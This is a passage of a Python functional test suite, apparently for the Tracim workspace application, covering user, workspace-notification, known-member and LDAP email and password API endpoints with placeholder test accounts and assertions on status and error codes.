role = rapi.get_one(test_user.user_id, workspace.workspace_id)
assert role.do_notify is False
def test_api_enable_user_workspace_notification__ok__200__user_itself(self):
# init DB
dbsession = get_tm_session(self.session_factory, transaction.manager)
admin = dbsession.query(User).filter(User.email == "admin@admin.admin").one()
workspace = WorkspaceApi(
current_user=admin, session=dbsession, config=self.app_config
).create_workspace("test workspace", save_now=True)
uapi = UserApi(current_user=admin, session=dbsession, config=self.app_config)
gapi = GroupApi(current_user=admin, session=dbsession, config=self.app_config)
groups = [gapi.get_one_with_name("users")]
test_user = uapi.create_user(
email="test@test.test",
password="password",
name="bob",
groups=groups,
timezone="Europe/Paris",
lang="fr",
do_save=True,
do_notify=False,
)
rapi = RoleApi(current_user=admin, session=dbsession, config=self.app_config)
rapi.create_one(test_user, workspace, UserRoleInWorkspace.READER, with_notif=True)
transaction.commit()
role = rapi.get_one(test_user.user_id, workspace.workspace_id)
assert role.do_notify is True
self.testapp.authorization = ("Basic", ("test@test.test", "password"))
self.testapp.put_json(
"/api/v2/users/{user_id}/workspaces/{workspace_id}/notifications/deactivate".format(
user_id=test_user.user_id, workspace_id=workspace.workspace_id
),
status=204,
)
dbsession = get_tm_session(self.session_factory, transaction.manager)
rapi = RoleApi(current_user=admin, session=dbsession, config=self.app_config)
role = rapi.get_one(test_user.user_id, workspace.workspace_id)
assert role.do_notify is False
def test_api_disable_user_workspace_notification__err__403__other_user(self):
# init DB
dbsession = get_tm_session(self.session_factory, transaction.manager)
admin = dbsession.query(User).filter(User.email == "admin@admin.admin").one()
workspace = WorkspaceApi(
current_user=admin, session=dbsession, config=self.app_config
).create_workspace("test workspace", save_now=True)
uapi = UserApi(current_user=admin, session=dbsession, config=self.app_config)
gapi = GroupApi(current_user=admin, session=dbsession, config=self.app_config)
groups = [gapi.get_one_with_name("users")]
test_user = uapi.create_user(
email="test@test.test",
password="password",
name="bob",
groups=groups,
timezone="Europe/Paris",
lang="fr",
do_save=True,
do_notify=False,
)
test_user2 = uapi.create_user(
email="test2@test2.test2",
password="password",
name="boby",
groups=groups,
timezone="Europe/Paris",
lang="fr",
do_save=True,
do_notify=False,
)
rapi = RoleApi(current_user=admin, session=dbsession, config=self.app_config)
rapi.create_one(test_user, workspace, UserRoleInWorkspace.READER, with_notif=True)
rapi.create_one(test_user2, workspace, UserRoleInWorkspace.READER, with_notif=False)
transaction.commit()
role = rapi.get_one(test_user.user_id, workspace.workspace_id)
assert role.do_notify is True
self.testapp.authorization = ("Basic", ("test2@test2.test2", "password"))
res = self.testapp.put_json(
"/api/v2/users/{user_id}/workspaces/{workspace_id}/notifications/deactivate".format(
user_id=test_user.user_id, workspace_id=workspace.workspace_id
),
status=403,
)
assert isinstance(res.json, dict)
assert "code" in res.json.keys()
assert res.json_body["code"] == ErrorCode.INSUFFICIENT_USER_PROFILE
class TestUserWorkspaceEndpoint(FunctionalTest):
"""
Tests for /api/v2/users/{user_id}/workspaces
"""
fixtures = [BaseFixture, ContentFixtures]
def test_api__get_user_workspaces__ok_200__nominal_case(self):
"""
Check obtain all workspaces reachables for user with user auth.
"""
dbsession = get_tm_session(self.session_factory, transaction.manager)
admin = dbsession.query(User).filter(User.email == "admin@admin.admin").one()
workspace_api = WorkspaceApi(session=dbsession, current_user=admin, config=self.app_config)
workspace = workspace_api.get_one(1)
app_api = ApplicationApi(app_list)
default_sidebar_entry = app_api.get_default_workspace_menu_entry(
workspace=workspace
) # nope8
self.testapp.authorization = ("Basic", ("admin@admin.admin", "admin@admin.admin"))
res = self.testapp.get("/api/v2/users/1/workspaces", status=200)
res = res.json_body
workspace = res[0]
assert workspace["workspace_id"] == 1
assert workspace["label"] == "Business"
assert workspace["slug"] == "business"
assert workspace["is_deleted"] is False
assert len(workspace["sidebar_entries"]) == len(default_sidebar_entry)
for counter, sidebar_entry in enumerate(default_sidebar_entry):
workspace["sidebar_entries"][counter]["slug"] = sidebar_entry.slug
workspace["sidebar_entries"][counter]["label"] = sidebar_entry.label
workspace["sidebar_entries"][counter]["route"] = sidebar_entry.route
workspace["sidebar_entries"][counter]["hexcolor"] = sidebar_entry.hexcolor
workspace["sidebar_entries"][counter]["fa_icon"] = sidebar_entry.fa_icon
def test_api__get_user_workspaces__err_403__unallowed_user(self):
"""
Check obtain all workspaces reachables for one user
with another non-admin user auth.
"""
self.testapp.authorization = ("Basic", ("lawrence-not-real-email@fsf.local", "foobarbaz"))
res = self.testapp.get("/api/v2/users/1/workspaces", status=403)
assert isinstance(res.json, dict)
assert "code" in res.json.keys()
assert res.json_body["code"] == ErrorCode.INSUFFICIENT_USER_PROFILE
assert "message" in res.json.keys()
assert "details" in res.json.keys()
def test_api__get_user_workspaces__err_401__unregistered_user(self):
"""
Check obtain all workspaces reachables for one user
without correct user auth (user unregistered).
"""
self.testapp.authorization = ("Basic", ("john@doe.doe", "lapin"))
res = self.testapp.get("/api/v2/users/1/workspaces", status=401)
assert isinstance(res.json, dict)
assert "code" in res.json.keys()
assert res.json_body["code"] is None
assert "message" in res.json.keys()
assert "details" in res.json.keys()
def test_api__get_user_workspaces__err_400__user_does_not_exist(self):
"""
Check obtain all workspaces reachables for one user who does
not exist
with a correct user auth.
"""
self.testapp.authorization = ("Basic", ("admin@admin.admin", "admin@admin.admin"))
res = self.testapp.get("/api/v2/users/5/workspaces", status=400)
assert isinstance(res.json, dict)
assert "code" in res.json.keys()
assert res.json_body["code"] == ErrorCode.USER_NOT_FOUND
assert "message" in res.json.keys()
assert "details" in res.json.keys()
class TestUserEndpoint(FunctionalTest):
# -*- coding: utf-8 -*-
"""
Tests for GET /api/v2/users/{user_id}
"""
fixtures = [BaseFixture]
def test_api__get_user__ok_200__admin(self):
dbsession = get_tm_session(self.session_factory, transaction.manager)
admin = dbsession.query(User).filter(User.email == "admin@admin.admin").one()
uapi = UserApi(current_user=admin, session=dbsession, config=self.app_config)
gapi = GroupApi(current_user=admin, session=dbsession, config=self.app_config)
groups = [gapi.get_one_with_name("users")]
test_user = uapi.create_user(
email="test@test.test",
password="password",
name="bob",
groups=groups,
timezone="Europe/Paris",
lang="fr",
do_save=True,
do_notify=False,
)
uapi.save(test_user)
transaction.commit()
user_id = int(test_user.user_id)
self.testapp.authorization = ("Basic", ("admin@admin.admin", "admin@admin.admin"))
res = self.testapp.get("/api/v2/users/{}".format(user_id), status=200)
res = res.json_body
assert res["user_id"] == user_id
assert res["created"]
assert res["is_active"] is True
assert res["profile"] == "users"
assert res["email"] == "test@test.test"
assert res["public_name"] == "bob"
assert res["timezone"] == "Europe/Paris"
assert res["is_deleted"] is False
assert res["lang"] == "fr"
def test_api__get_user__ok_200__user_itself(self):
dbsession = get_tm_session(self.session_factory, transaction.manager)
admin = dbsession.query(User).filter(User.email == "admin@admin.admin").one()
uapi = UserApi(current_user=admin, session=dbsession, config=self.app_config)
gapi = GroupApi(current_user=admin, session=dbsession, config=self.app_config)
groups = [gapi.get_one_with_name("users")]
test_user = uapi.create_user(
email="test@test.test",
password="password",
name="bob",
groups=groups,
timezone="Europe/Paris",
lang="fr",
do_save=True,
do_notify=False,
)
uapi.save(test_user)
transaction.commit()
user_id = int(test_user.user_id)
self.testapp.authorization = ("Basic", ("test@test.test", "password"))
res = self.testapp.get("/api/v2/users/{}".format(user_id), status=200)
res = res.json_body
assert res["user_id"] == user_id
assert res["created"]
assert res["is_active"] is True
assert res["profile"] == "users"
assert res["email"] == "test@test.test"
assert res["public_name"] == "bob"
assert res["timezone"] == "Europe/Paris"
assert res["is_deleted"] is False
def test_api__get_user__err_403__other_normal_user(self):
dbsession = get_tm_session(self.session_factory, transaction.manager)
admin = dbsession.query(User).filter(User.email == "admin@admin.admin").one()
uapi = UserApi(current_user=admin, session=dbsession, config=self.app_config)
gapi = GroupApi(current_user=admin, session=dbsession, config=self.app_config)
groups = [gapi.get_one_with_name("users")]
test_user = uapi.create_user(
email="test@test.test",
password="password",
name="bob",
groups=groups,
timezone="Europe/Paris",
do_save=True,
do_notify=False,
)
test_user2 = uapi.create_user(
email="test2@test2.test2",
password="password",
name="bob2",
groups=groups,
timezone="Europe/Paris",
lang="fr",
do_save=True,
do_notify=False,
)
uapi.save(test_user2)
uapi.save(test_user)
transaction.commit()
user_id = int(test_user.user_id)
self.testapp.authorization = ("Basic", ("test2@test2.test2", "password"))
res = self.testapp.get("/api/v2/users/{}".format(user_id), status=403)
assert isinstance(res.json, dict)
assert "code" in res.json.keys()
assert res.json_body["code"] == ErrorCode.INSUFFICIENT_USER_PROFILE
def test_api__create_user__ok_200__full_admin(self):
self.testapp.authorization = ("Basic", ("admin@admin.admin", "admin@admin.admin"))
params = {
"email": "test@test.test",
"password": "mysuperpassword",
"profile": "users",
"timezone": "Europe/Paris",
"lang": "fr",
"public_name": "test user",
"email_notification": False,
}
res = self.testapp.post_json("/api/v2/users", status=200, params=params)
res = res.json_body
assert res["user_id"]
user_id = res["user_id"]
assert res["created"]
assert res["is_active"] is True
assert res["profile"] == "users"
assert res["email"] == "test@test.test"
assert res["public_name"] == "test user"
assert res["timezone"] == "Europe/Paris"
assert res["lang"] == "fr"
dbsession = get_tm_session(self.session_factory, transaction.manager)
admin = dbsession.query(User).filter(User.email == "admin@admin.admin").one()
uapi = UserApi(current_user=admin, session=dbsession, config=self.app_config)
user = uapi.get_one(user_id)
assert user.email == "test@test.test"
assert user.validate_password("mysuperpassword")
def test_api__create_user__ok_200__limited_admin(self):
self.testapp.authorization = ("Basic", ("admin@admin.admin", "admin@admin.admin"))
params = {"email": "test@test.test", "email_notification": False, "password": None}
res = self.testapp.post_json("/api/v2/users", status=200, params=params)
res = res.json_body
assert res["user_id"]
user_id = res["user_id"]
assert res["created"]
assert res["is_active"] is True
assert res["profile"] == "users"
assert res["email"] == "test@test.test"
assert res["public_name"] == "test"
assert res["timezone"] == ""
assert res["lang"] is None
assert res["auth_type"] == "unknown"
dbsession = get_tm_session(self.session_factory, transaction.manager)
admin = dbsession.query(User).filter(User.email == "admin@admin.admin").one()
uapi = UserApi(current_user=admin, session=dbsession, config=self.app_config)
user = uapi.get_one(user_id)
assert user.email == "test@test.test"
assert user.password is None
def test_api__create_user__err_400__email_already_in_db(self):
dbsession = get_tm_session(self.session_factory, transaction.manager)
admin = dbsession.query(User).filter(User.email == "admin@admin.admin").one()
uapi = UserApi(current_user=admin, session=dbsession, config=self.app_config)
gapi = GroupApi(current_user=admin, session=dbsession, config=self.app_config)
groups = [gapi.get_one_with_name("users")]
test_user = uapi.create_user(
email="test@test.test",
password="password",
name="bob",
groups=groups,
timezone="Europe/Paris",
lang="fr",
do_save=True,
do_notify=False,
)
uapi.save(test_user)
transaction.commit()
self.testapp.authorization = ("Basic", ("admin@admin.admin", "admin@admin.admin"))
params = {
"email": "test@test.test",
"password": "mysuperpassword",
"profile": "users",
"timezone": "Europe/Paris",
"lang": "fr",
"public_name": "test user",
"email_notification": False,
}
res = self.testapp.post_json("/api/v2/users", status=400, params=params)
assert isinstance(res.json, dict)
assert "code" in res.json.keys()
assert res.json_body["code"] == ErrorCode.EMAIL_ALREADY_EXIST_IN_DB
def test_api__create_user__err_403__other_user(self):
dbsession = get_tm_session(self.session_factory, transaction.manager)
admin = dbsession.query(User).filter(User.email == "admin@admin.admin").one()
uapi = UserApi(current_user=admin, session=dbsession, config=self.app_config)
gapi = GroupApi(current_user=admin, session=dbsession, config=self.app_config)
groups = [gapi.get_one_with_name("users")]
test_user = uapi.create_user(
email="test@test.test",
password="password",
name="bob",
groups=groups,
timezone="Europe/Paris",
lang="fr",
do_save=True,
do_notify=False,
)
uapi.save(test_user)
transaction.commit()
self.testapp.authorization = ("Basic", ("test@test.test", "password"))
params = {
"email": "test2@test2.test2",
"password": "mysuperpassword",
"profile": "users",
"timezone": "Europe/Paris",
"public_name": "test user",
"lang": "fr",
"email_notification": False,
}
res = self.testapp.post_json("/api/v2/users", status=403, params=params)
assert isinstance(res.json, dict)
assert "code" in res.json.keys()
assert res.json_body["code"] == ErrorCode.INSUFFICIENT_USER_PROFILE
class TestUserWithNotificationEndpoint(MailHogFunctionalTest):
"""
Tests for POST /api/v2/users/{user_id}
"""
config_section = "functional_test_with_mail_test_sync"
def test_api__create_user__ok_200__full_admin_with_notif(self):
self.testapp.authorization = ("Basic", ("admin@admin.admin", "admin@admin.admin"))
params = {
"email": "test@test.test",
"password": "mysuperpassword",
"profile": "users",
"timezone": "Europe/Paris",
"public_name": "test user",
"lang": "fr",
"email_notification": True,
}
res = self.testapp.post_json("/api/v2/users", status=200, params=params)
res = res.json_body
assert res["user_id"]
user_id = res["user_id"]
assert res["created"]
assert res["is_active"] is True
assert res["profile"] == "users"
assert res["email"] == "test@test.test"
assert res["public_name"] == "test user"
assert res["timezone"] == "Europe/Paris"
assert res["lang"] == "fr"
dbsession = get_tm_session(self.session_factory, transaction.manager)
admin = dbsession.query(User).filter(User.email == "admin@admin.admin").one()
uapi = UserApi(current_user=admin, session=dbsession, config=self.app_config)
user = uapi.get_one(user_id)
assert user.email == "test@test.test"
assert user.validate_password("mysuperpassword")
# check mail received
response = self.get_mailhog_mails()
assert len(response) == 1
headers = response[0]["Content"]["Headers"]
assert headers["From"][0] == "Tracim Notifications <test_user_from+0@localhost>"
assert headers["To"][0] == "test user <test@test.test>"
assert headers["Subject"][0] == "[TRACIM] Created account"
def test_api__create_user__ok_200__limited_admin_with_notif(self):
self.testapp.authorization = ("Basic", ("admin@admin.admin", "admin@admin.admin"))
params = {"email": "test@test.test", "email_notification": True}
res = self.testapp.post_json("/api/v2/users", status=200, params=params)
res = res.json_body
assert res["user_id"]
user_id = res["user_id"]
assert res["created"]
assert res["is_active"] is True
assert res["profile"] == "users"
assert res["email"] == "test@test.test"
assert res["public_name"] == "test"
assert res["timezone"] == ""
assert res["lang"] is None
dbsession = get_tm_session(self.session_factory, transaction.manager)
admin = dbsession.query(User).filter(User.email == "admin@admin.admin").one()
uapi = UserApi(current_user=admin, session=dbsession, config=self.app_config)
user = uapi.get_one(user_id)
assert user.email == "test@test.test"
assert user.password
assert user.auth_type == AuthType.UNKNOWN
# check mail received
response = self.get_mailhog_mails()
assert len(response) == 1
headers = response[0]["Content"]["Headers"]
assert headers["From"][0] == "Tracim Notifications <test_user_from+0@localhost>"
assert headers["To"][0] == "test <test@test.test>"
assert headers["Subject"][0] == "[TRACIM] Created account"
def test_api_delete_user__ok_200__admin(self):
dbsession = get_tm_session(self.session_factory, transaction.manager)
admin = dbsession.query(User).filter(User.email == "admin@admin.admin").one()
uapi = UserApi(current_user=admin, session=dbsession, config=self.app_config)
gapi = GroupApi(current_user=admin, session=dbsession, config=self.app_config)
groups = [gapi.get_one_with_name("users")]
test_user = uapi.create_user(
email="test@test.test",
password="password",
name="bob",
groups=groups,
timezone="Europe/Paris",
lang="fr",
do_save=True,
do_notify=False,
)
uapi.save(test_user)
transaction.commit()
user_id = int(test_user.user_id)
self.testapp.authorization = ("Basic", ("admin@admin.admin", "admin@admin.admin"))
self.testapp.put("/api/v2/users/{}/trashed".format(user_id), status=204)
res = self.testapp.get("/api/v2/users/{}".format(user_id), status=200).json_body
assert res["is_deleted"] is True
def test_api_delete_user__err_400__admin_itself(self):
dbsession = get_tm_session(self.session_factory, transaction.manager)
admin = dbsession.query(User).filter(User.email == "admin@admin.admin").one()
self.testapp.authorization = ("Basic", ("admin@admin.admin", "admin@admin.admin"))
res = self.testapp.put("/api/v2/users/{}/trashed".format(admin.user_id), status=400)
assert res.json_body["code"] == ErrorCode.USER_CANT_DELETE_HIMSELF
res = self.testapp.get("/api/v2/users/{}".format(admin.user_id), status=200).json_body
assert res["is_deleted"] is False
class TestUsersEndpoint(FunctionalTest):
# -*- coding: utf-8 -*-
"""
Tests for GET /api/v2/users/{user_id}
"""
fixtures = [BaseFixture]
def test_api__get_user__ok_200__admin(self):
dbsession = get_tm_session(self.session_factory, transaction.manager)
admin = dbsession.query(User).filter(User.email == "admin@admin.admin").one()
uapi = UserApi(current_user=admin, session=dbsession, config=self.app_config)
gapi = GroupApi(current_user=admin, session=dbsession, config=self.app_config)
groups = [gapi.get_one_with_name("users")]
test_user = uapi.create_user(
email="test@test.test",
password="password",
name="bob",
groups=groups,
timezone="Europe/Paris",
lang="fr",
do_save=True,
do_notify=False,
)
uapi.save(test_user)
transaction.commit()
self.testapp.authorization = ("Basic", ("admin@admin.admin", "admin@admin.admin"))
res = self.testapp.get("/api/v2/users", status=200)
res = res.json_body
assert len(res) == 2
assert res[0]["user_id"] == test_user.user_id
assert res[0]["public_name"] == test_user.display_name
assert res[0]["avatar_url"] is None
assert res[1]["user_id"] == admin.user_id
assert res[1]["public_name"] == admin.display_name
assert res[1]["avatar_url"] is None
def test_api__get_user__err_403__normal_user(self):
dbsession = get_tm_session(self.session_factory, transaction.manager)
admin = dbsession.query(User).filter(User.email == "admin@admin.admin").one()
uapi = UserApi(current_user=admin, session=dbsession, config=self.app_config)
gapi = GroupApi(current_user=admin, session=dbsession, config=self.app_config)
groups = [gapi.get_one_with_name("users")]
test_user = uapi.create_user(
email="test@test.test",
password="password",
name="bob",
groups=groups,
timezone="Europe/Paris",
lang="fr",
do_save=True,
do_notify=False,
)
uapi.save(test_user)
transaction.commit()
self.testapp.authorization = ("Basic", ("test@test.test", "password"))
res = self.testapp.get("/api/v2/users", status=403)
assert isinstance(res.json, dict)
assert "code" in res.json.keys()
assert res.json_body["code"] == ErrorCode.INSUFFICIENT_USER_PROFILE
class TestKnownMembersEndpoint(FunctionalTest):
# -*- coding: utf-8 -*-
"""
Tests for GET /api/v2/users/{user_id}
"""
fixtures = [BaseFixture]
def test_api__get_user__ok_200__admin__by_name(self):
dbsession = get_tm_session(self.session_factory, transaction.manager)
admin = dbsession.query(User).filter(User.email == "admin@admin.admin").one()
uapi = UserApi(current_user=admin, session=dbsession, config=self.app_config)
gapi = GroupApi(current_user=admin, session=dbsession, config=self.app_config)
groups = [gapi.get_one_with_name("users")]
test_user = uapi.create_user(
email="test@test.test",
password="password",
name="bob",
groups=groups,
timezone="Europe/Paris",
lang="fr",
do_save=True,
do_notify=False,
)
test_user2 = uapi.create_user(
email="test2@test2.test2",
password="password",
name="bob2",
groups=groups,
timezone="Europe/Paris",
lang="fr",
do_save=True,
do_notify=False,
)
uapi.save(test_user)
uapi.save(test_user2)
transaction.commit()
user_id = int(admin.user_id)
self.testapp.authorization = ("Basic", ("admin@admin.admin", "admin@admin.admin"))
params = {"acp": "bob"}
res = self.testapp.get(
"/api/v2/users/{user_id}/known_members".format(user_id=user_id),
status=200,
params=params,
)
res = res.json_body
assert len(res) == 2
assert res[0]["user_id"] == test_user.user_id
assert res[0]["public_name"] == test_user.display_name
assert res[0]["avatar_url"] is None
assert res[1]["user_id"] == test_user2.user_id
assert res[1]["public_name"] == test_user2.display_name
assert res[1]["avatar_url"] is None
def test_api__get_user__ok_200__admin__by_name_exclude_user(self):
dbsession = get_tm_session(self.session_factory, transaction.manager)
admin = dbsession.query(User).filter(User.email == "admin@admin.admin").one()
uapi = UserApi(current_user=admin, session=dbsession, config=self.app_config)
gapi = GroupApi(current_user=admin, session=dbsession, config=self.app_config)
groups = [gapi.get_one_with_name("users")]
test_user = uapi.create_user(
email="test@test.test",
password="password",
name="bob",
groups=groups,
timezone="Europe/Paris",
lang="fr",
do_save=True,
do_notify=False,
)
test_user2 = uapi.create_user(
email="test2@test2.test2",
password="password",
name="bob2",
groups=groups,
timezone="Europe/Paris",
lang="fr",
do_save=True,
do_notify=False,
)
uapi.save(test_user)
uapi.save(test_user2)
transaction.commit()
user_id = int(admin.user_id)
self.testapp.authorization = ("Basic", ("admin@admin.admin", "admin@admin.admin"))
params = {"acp": "bob", "exclude_user_ids": str(test_user2.user_id)}
res = self.testapp.get(
"/api/v2/users/{user_id}/known_members".format(user_id=user_id),
status=200,
params=params,
)
res = res.json_body
assert len(res) == 1
assert res[0]["user_id"] == test_user.user_id
assert res[0]["public_name"] == test_user.display_name
assert res[0]["avatar_url"] is None
def test_api__get_user__ok_200__admin__by_name_exclude_workspace(self):
dbsession = get_tm_session(self.session_factory, transaction.manager)
admin = dbsession.query(User).filter(User.email == "admin@admin.admin").one()
uapi = UserApi(current_user=admin, session=dbsession, config=self.app_config)
gapi = GroupApi(current_user=admin, session=dbsession, config=self.app_config)
groups = [gapi.get_one_with_name("users")]
test_user = uapi.create_user(
email="test@test.test",
password="password",
name="bob",
groups=groups,
timezone="Europe/Paris",
lang="fr",
do_save=True,
do_notify=False,
)
test_user2 = uapi.create_user(
email="test2@test2.test2",
password="password",
name="bob2",
groups=groups,
timezone="Europe/Paris",
lang="fr",
do_save=True,
do_notify=False,
)
workspace = WorkspaceApi(
current_user=admin, session=dbsession, config=self.app_config
).create_workspace("test workspace", save_now=True)
workspace2 = WorkspaceApi(
current_user=admin, session=dbsession, config=self.app_config
).create_workspace("test workspace2", save_now=True)
role_api = RoleApi(current_user=admin, session=dbsession, config=self.app_config)
role_api.create_one(test_user, workspace, UserRoleInWorkspace.READER, False)
role_api.create_one(test_user2, workspace2, UserRoleInWorkspace.READER, False)
uapi.save(test_user)
uapi.save(test_user2)
transaction.commit()
user_id = int(admin.user_id)
self.testapp.authorization = ("Basic", ("admin@admin.admin", "admin@admin.admin"))
params = {"acp": "bob", "exclude_workspace_ids": str(workspace2.workspace_id)}
res = self.testapp.get(
"/api/v2/users/{user_id}/known_members".format(user_id=user_id),
status=200,
params=params,
)
res = res.json_body
assert len(res) == 1
assert res[0]["user_id"] == test_user.user_id
assert res[0]["public_name"] == test_user.display_name
assert res[0]["avatar_url"] is None
def test_api__get_user__ok_200__admin__by_name_exclude_workspace_and_user(self):
dbsession = get_tm_session(self.session_factory, transaction.manager)
admin = dbsession.query(User).filter(User.email == "admin@admin.admin").one()
uapi = UserApi(current_user=admin, session=dbsession, config=self.app_config)
gapi = GroupApi(current_user=admin, session=dbsession, config=self.app_config)
groups = [gapi.get_one_with_name("users")]
test_user = uapi.create_user(
email="test@test.test",
password="password",
name="bob",
groups=groups,
timezone="Europe/Paris",
lang="fr",
do_save=True,
do_notify=False,
)
test_user2 = uapi.create_user(
email="test2@test2.test2",
password="password",
name="bob2",
groups=groups,
timezone="Europe/Paris",
lang="fr",
do_save=True,
do_notify=False,
)
test_user3 = uapi.create_user(
email="test3@test3.test3",
password="password",
name="bob3",
groups=groups,
timezone="Europe/Paris",
lang="fr",
do_save=True,
do_notify=False,
)
workspace = WorkspaceApi(
current_user=admin, session=dbsession, config=self.app_config
).create_workspace("test workspace", save_now=True)
workspace2 = WorkspaceApi(
current_user=admin, session=dbsession, config=self.app_config
).create_workspace("test workspace2", save_now=True)
role_api = RoleApi(current_user=admin, session=dbsession, config=self.app_config)
role_api.create_one(test_user, workspace, UserRoleInWorkspace.READER, False)
role_api.create_one(test_user2, workspace2, UserRoleInWorkspace.READER, False)
role_api.create_one(test_user3, workspace, UserRoleInWorkspace.READER, False)
uapi.save(test_user)
uapi.save(test_user2)
transaction.commit()
user_id = int(admin.user_id)
self.testapp.authorization = ("Basic", ("admin@admin.admin", "admin@admin.admin"))
params = {
"acp": "bob",
"exclude_workspace_ids": str(workspace2.workspace_id),
"exclude_user_ids": str(test_user3.user_id),
}
res = self.testapp.get(
"/api/v2/users/{user_id}/known_members".format(user_id=user_id),
status=200,
params=params,
)
res = res.json_body
assert len(res) == 1
assert res[0]["user_id"] == test_user.user_id
assert res[0]["public_name"] == test_user.display_name
assert res[0]["avatar_url"] is None
def test_api__get_user__ok_200__admin__by_name__deactivated_members(self):
dbsession = get_tm_session(self.session_factory, transaction.manager)
admin = dbsession.query(User).filter(User.email == "admin@admin.admin").one()
uapi = UserApi(current_user=admin, session=dbsession, config=self.app_config)
gapi = GroupApi(current_user=admin, session=dbsession, config=self.app_config)
groups = [gapi.get_one_with_name("users")]
test_user = uapi.create_user(
email="test@test.test",
password="password",
name="bob",
groups=groups,
timezone="Europe/Paris",
lang="fr",
do_save=True,
do_notify=False,
)
test_user2 = uapi.create_user(
email="test2@test2.test2",
password="password",
name="bob2",
groups=groups,
timezone="Europe/Paris",
lang="fr",
do_save=True,
do_notify=False,
)
test_user2.is_active = False
uapi.save(test_user)
uapi.save(test_user2)
transaction.commit()
user_id = int(admin.user_id)
self.testapp.authorization = ("Basic", ("admin@admin.admin", "admin@admin.admin"))
params = {"acp": "bob"}
res = self.testapp.get(
"/api/v2/users/{user_id}/known_members".format(user_id=user_id),
status=200,
params=params,
)
res = res.json_body
assert len(res) == 1
assert res[0]["user_id"] == test_user.user_id
assert res[0]["public_name"] == test_user.display_name
assert res[0]["avatar_url"] is None
def test_api__get_user__ok_200__admin__by_email(self):
dbsession = get_tm_session(self.session_factory, transaction.manager)
admin = dbsession.query(User).filter(User.email == "admin@admin.admin").one()
uapi = UserApi(current_user=admin, session=dbsession, config=self.app_config)
gapi = GroupApi(current_user=admin, session=dbsession, config=self.app_config)
groups = [gapi.get_one_with_name("users")]
test_user = uapi.create_user(
email="test@test.test",
password="password",
name="bob",
groups=groups,
timezone="Europe/Paris",
lang="fr",
do_save=True,
do_notify=False,
)
test_user2 = uapi.create_user(
email="test2@test2.test2",
password="password",
name="bob2",
groups=groups,
timezone="Europe/Paris",
lang="fr",
do_save=True,
do_notify=False,
)
uapi.save(test_user)
uapi.save(test_user2)
transaction.commit()
user_id = int(admin.user_id)
self.testapp.authorization = ("Basic", ("admin@admin.admin", "admin@admin.admin"))
params = {"acp": "test"}
res = self.testapp.get(
"/api/v2/users/{user_id}/known_members".format(user_id=user_id),
status=200,
params=params,
)
res = res.json_body
assert len(res) == 2
assert res[0]["user_id"] == test_user.user_id
assert res[0]["public_name"] == test_user.display_name
assert res[0]["avatar_url"] is None
assert res[1]["user_id"] == test_user2.user_id
assert res[1]["public_name"] == test_user2.display_name
assert res[1]["avatar_url"] is None
def test_api__get_user__err_403__admin__too_small_acp(self):
dbsession = get_tm_session(self.session_factory, transaction.manager)
admin = dbsession.query(User).filter(User.email == "admin@admin.admin").one()
uapi = UserApi(current_user=admin, session=dbsession, config=self.app_config)
gapi = GroupApi(current_user=admin, session=dbsession, config=self.app_config)
groups = [gapi.get_one_with_name("users")]
test_user = uapi.create_user(
email="test@test.test",
password="password",
name="bob",
groups=groups,
timezone="Europe/Paris",
lang="fr",
do_save=True,
do_notify=False,
)
uapi.create_user(
email="test2@test2.test2",
password="password",
name="bob2",
groups=groups,
timezone="Europe/Paris",
lang="fr",
do_save=True,
do_notify=False,
)
uapi.save(test_user)
transaction.commit()
user_id = int(admin.user_id)
self.testapp.authorization = ("Basic", ("admin@admin.admin", "admin@admin.admin"))
params = {"acp": "t"}
res = self.testapp.get(
"/api/v2/users/{user_id}/known_members".format(user_id=user_id),
status=400,
params=params,
)
assert isinstance(res.json, dict)
assert "code" in res.json.keys()
assert res.json_body["code"] == ErrorCode.GENERIC_SCHEMA_VALIDATION_ERROR
def test_api__get_user__ok_200__normal_user_by_email(self):
dbsession = get_tm_session(self.session_factory, transaction.manager)
admin = dbsession.query(User).filter(User.email == "admin@admin.admin").one()
uapi = UserApi(current_user=admin, session=dbsession, config=self.app_config)
gapi = GroupApi(current_user=admin, session=dbsession, config=self.app_config)
groups = [gapi.get_one_with_name("users")]
test_user = uapi.create_user(
email="test@test.test",
password="password",
name="bob",
groups=groups,
timezone="Europe/Paris",
lang="fr",
do_save=True,
do_notify=False,
)
test_user2 = uapi.create_user(
email="test2@test2.test2",
password="password",
name="bob2",
groups=groups,
timezone="Europe/Paris",
lang="fr",
do_save=True,
do_notify=False,
)
test_user3 = uapi.create_user(
email="test3@test3.test3",
password="password",
name="bob3",
groups=groups,
timezone="Europe/Paris",
lang="fr",
do_save=True,
do_notify=False,
)
uapi.save(test_user)
uapi.save(test_user2)
uapi.save(test_user3)
workspace = WorkspaceApi(
current_user=admin, session=dbsession, config=self.app_config
).create_workspace("test workspace", save_now=True)
role_api = RoleApi(current_user=admin, session=dbsession, config=self.app_config)
role_api.create_one(test_user, workspace, UserRoleInWorkspace.READER, False)
role_api.create_one(test_user2, workspace, UserRoleInWorkspace.READER, False)
transaction.commit()
user_id = int(test_user.user_id)
self.testapp.authorization = ("Basic", ("test@test.test", "password"))
params = {"acp": "test"}
res = self.testapp.get(
"/api/v2/users/{user_id}/known_members".format(user_id=user_id),
status=200,
params=params,
)
res = res.json_body
assert len(res) == 2
assert res[0]["user_id"] == test_user.user_id
assert res[0]["public_name"] == test_user.display_name
assert res[0]["avatar_url"] is None
assert res[1]["user_id"] == test_user2.user_id
assert res[1]["public_name"] == test_user2.display_name
assert res[1]["avatar_url"] is None
class TestSetEmailPasswordLdapEndpoint(FunctionalTest):
# -*- coding: utf-8 -*-
"""
Tests for PUT /api/v2/users/{user_id}/email
Tests for PUT /api/v2/users/{user_id}/password
for ldap user
"""
fixtures = [BaseFixture]
config_section = "functional_ldap_and_internal_test"
def test_api__set_user_email__ok_200__ldap_user(self):
dbsession = get_tm_session(self.session_factory, transaction.manager)
admin = dbsession.query(User).filter(User.email == "admin@admin.admin").one()
uapi = UserApi(current_user=admin, session=dbsession, config=self.app_config)
gapi = GroupApi(current_user=admin, session=dbsession, config=self.app_config)
groups = [gapi.get_one_with_name("users")]
test_user = uapi.create_user(
email="test@test.test",
password=None,
name="bob",
groups=groups,
timezone="Europe/Paris",
lang="fr",
auth_type=AuthType.LDAP,
do_save=True,
do_notify=False,
)
uapi.save(test_user)
transaction.commit()
user_id = int(test_user.user_id)
self.testapp.authorization = ("Basic", ("admin@admin.admin", "admin@admin.admin"))
# check before
res = self.testapp.get("/api/v2/users/{}".format(user_id), status=200)
res = res.json_body
assert res["email"] == "test@test.test"
# Set password
params = {"email": "mysuperemail@email.fr", "loggedin_user_password": "admin@admin.admin"}
res = self.testapp.put_json(
